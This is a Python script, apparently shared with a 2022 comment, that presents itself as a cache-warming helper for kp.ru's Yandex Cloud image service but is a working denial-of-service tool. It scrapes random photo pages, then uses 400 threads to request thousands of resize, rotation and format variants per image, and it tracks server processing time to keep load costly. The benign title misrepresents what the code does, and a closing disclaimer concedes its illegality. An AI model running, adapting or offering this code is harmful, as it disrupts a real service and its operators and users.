Helps the kp.ru/Yandex Cloud image generation service cache images
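
The script picks random kp.ru photo sections, scrapes them for re-scalable image URLs, then requests every supported width, height, rotation and format variant of each image, forcing the resizing service to generate (and cache) each variant. One producer thread feeds a shared queue of image URLs; 400 consumer threads drain it.
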
from bs4 import BeautifulSoup
import re
import threading
import requests
import random
import string
import time

headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Stop-War': 'true',
}
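
# Producer: scrape random kp.ru photo sections and yield the URLs of
# re-scalable images (links whose path ends in /wr-<width>.<ext>).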
def get_image_urls():
    image_url_pattern = re.compile(r'/wr-\d+\.\w+$')
    while True:
        image_section_id = random.randint(1, 79108)
        # Load the next image section.
        image_section_url = "https://www.kp.ru/photo/%d/" % image_section_id
        try:
            image_section_html = requests.get(
                image_section_url, headers=headers).text
        except requests.exceptions.RequestException:
            continue
        # Find all of the image links on this page and
        # yield them for later use.
        image_section_soup = BeautifulSoup(image_section_html, 'html.parser')
        # Iterate over re-scalable images.
        for image_url in [str(img.get('data-content-src'))
                          for img in image_section_soup.find_all('div')]:
            if image_url_pattern.search(image_url) is None:
                continue
            yield image_url
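
# Fetch one image variant; return (total request time in seconds, time the
# upstream image service spent processing it, HTTP status code), or None if
# the request itself failed.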
def fetch_image_url(url):
    r_start_time = time.time()
    try:
        r = requests.get(url, headers=headers, stream=True)
    except requests.exceptions.RequestException:
        return None
    r_end_time = time.time()
    r_dt = r_end_time - r_start_time
    # How much time the server spent processing the image,
    # as reported by the x-envoy-upstream-service-time header.
    wasted_time = 0
    try:
        wasted_time = float(
            r.headers['x-envoy-upstream-service-time']) / 1000.0
    except Exception:
        pass
    return (r_dt, wasted_time, r.status_code)
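
# Consumer: for a single image URL, request every supported width, height,
# rotation and format variant of it, so that each variant has to be
# generated (and cached) server-side.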
def attack_image_url(url):
    def get_image_width(prefix):
        return [
            # Common sizes.
            ("common_%s-width" % prefix, [
                '%s-%d' % (prefix, w)
                for w in [80, 100, 136, 200, 360, 420, 750, 767, 800, 960, 1280]
            ]),
            # Random sizes.
            ("random_%s-width" % prefix, [
                '%s-%d' % (prefix, 1281 + i) for i in range(1000)
            ]),
        ]

    def get_image_height(prefix):
        return [
            # Common sizes.
            ("common_%s-height" % prefix, [
                '%s-%d' % (prefix, h) for h in [100, 360, 960, 1280]
            ]),
            # Random sizes.
            ("random_%s-height" % prefix, [
                '%s-%d' % (prefix, 1281 + i) for i in range(1000)
            ]),
        ]

    # All of the image formats that are supported by the server.
    formats = [
        'png',
        'jpg',
        'webp',
    ]
    name_groups = []
    name_groups.extend(get_image_width("wr"))
    name_groups.extend(get_image_width("w"))
    name_groups.extend(get_image_height("hr"))
    name_groups.extend([
        # Common rotations.
        ("common_rot", [
            'ro',
            'ro-90',
            'ro-270',
            'ro-180',
        ]),
        # All rotations.
        ("random_rot", ['ro-%d' % (1 + i) for i in range(1080)]),
        # Random names.
        ("random_names", [
            ''.join(
                random.choices(string.ascii_uppercase + string.digits, k=10)
            ) for i in range(1000)
        ]),
    ])
    for fmt in formats:
        for group, names in name_groups:
            for name in names:
                file = name + "." + fmt
                target_url = requests.compat.urljoin(url, file)
                # Request the given image variant.
                r = fetch_image_url(target_url)
                if r is None or r[2] == 404:
                    print('Got 404 (or no response) for "%s".' % target_url)
                    break
                print('Got %d for "%s" in %.2fs., wasted %fs.' %
                      (r[2], target_url, r[0], r[1]))
                if r[1] < 0.1 and r[2] == 200:  # wasted less than 0.1s
                    break
    return None
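
# Shared work queue: one producer thread fills it with image URLs while
# many consumer threads drain it.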
image_urls = []


def produce_image_urls():
    for url in get_image_urls():
        while len(image_urls) > 300:
            time.sleep(0.1)
        image_urls.append(url)


def consume_image_urls():
    while True:
        while len(image_urls):
            try:
                url = image_urls.pop()
            except IndexError:
                continue
            attack_image_url(url)
        time.sleep(0.1)


for _ in range(1):
    t = threading.Thread(target=produce_image_urls)
    t.start()
for _ in range(400):
    t = threading.Thread(target=consume_image_urls)
    t.start()
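
# A single-URL smoke test, without spawning the threads above, might look
# like this (the URL is hypothetical and only mirrors the /wr-<width>.<ext>
# shape the scraper yields):
#
#   attack_image_url("https://www.kp.ru/photo/12345/wr-750.jpg")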
AChep commented Mar 5, 2022

DISCLAIMER: (D)DoS'ing is illegal! Usage of this script is intended for educational and testing purposes only!
